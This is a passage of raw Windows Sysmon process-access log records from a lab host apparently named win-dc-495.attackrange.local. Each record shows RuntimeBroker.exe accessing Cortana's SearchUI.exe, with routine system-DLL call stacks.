13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405544C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405544C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405660C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405660C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405268C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405936C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}4540808C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405268C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}4540808C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405944C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405944C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405660C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405660C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405980C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405980C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT